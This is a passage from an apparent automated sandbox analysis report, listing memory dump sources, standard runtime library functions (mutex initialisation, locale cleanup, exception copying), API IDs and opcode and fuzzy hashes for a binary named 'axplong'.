                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: @.m$`zn
                      • API String ID: 3366076730-2638107607
                      • Opcode ID: af51ed715edc4c8224fd6d43cd606139d9bfdb1ebf3f518d25cdb29ff41c8e86
                      • Instruction ID: 033223a88629cd39cb3d8f679b369af0a76f8595e506585976383a8ae04741da
                      • Opcode Fuzzy Hash: af51ed715edc4c8224fd6d43cd606139d9bfdb1ebf3f518d25cdb29ff41c8e86
                      • Instruction Fuzzy Hash: C3A126B0E027598FDB21CFA9C98479EBBF1BF48710F188159E919AB351E7759D01CB80
                      Function 0070F21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___free_lconv_mon
                      • String ID: 8"s$`'s
                      • API String ID: 3903695350-2260233155
                      • Opcode ID: 912c7205078118071e4bdb44ff0650adc516b4188777369d61b493c9ea162b3b
                      • Instruction ID: 416002f5adc3ccf4e91e14932aedc5d94d2d9a102334e5a1cbd061a6ac84d5d4
                      • Opcode Fuzzy Hash: 912c7205078118071e4bdb44ff0650adc516b4188777369d61b493c9ea162b3b
                      • Instruction Fuzzy Hash: 93313931604305EFEB31AB78D949B5BB3E9BF40320F154629E45AD76D1DF79AC808B21
                      Function 006D3930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 006D3962
                      • __Mtx_init_in_situ.LIBCPMT ref: 006D39A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: pBm
                      • API String ID: 3366076730-1526497568
                      • Opcode ID: 323ff7d29d5e5ffaecc2a647ba0bc5179dcadd21559c661b307201824ff5dc10
                      • Instruction ID: 40fc910a7cf79aff5a86188afc6d9fa6feb5e3378643f11cb847d9e4abf7abdc
                      • Opcode Fuzzy Hash: 323ff7d29d5e5ffaecc2a647ba0bc5179dcadd21559c661b307201824ff5dc10
                      • Instruction Fuzzy Hash: D34135B0601B058FD720CF19C588B9ABBF1FF44315F14861EE96A8B341E7B4EA15CB81
                      Function 006D2520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 006D2552
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.3422964384.00000000006D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006D0000, based on PE: true
                      • Associated: 00000008.00000002.3422938744.00000000006D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3422964384.0000000000732000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423081839.0000000000739000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.000000000073B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000008BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009CB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3423106057.00000000009D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424771154.00000000009DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424931044.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000008.00000002.3424959157.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_6d0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#m$P#m
                      • API String ID: 2659868963-2422574832
                      • Opcode ID: 39c7459c8f36b893cb8f190eef7c9715a2f1c8621b91245d55db8287e0ed4385
                      • Instruction ID: c78338a13d3ffb021fef9f9bbfbdb951c9411b1d495038a27ad992f2df42dafd
                      • Opcode Fuzzy Hash: 39c7459c8f36b893cb8f190eef7c9715a2f1c8621b91245d55db8287e0ed4385
                      • Instruction Fuzzy Hash: 81F0A771E1120DDBC714DF68D84198EBBF9AF55300F1082AEF44467201EB746B59CBD9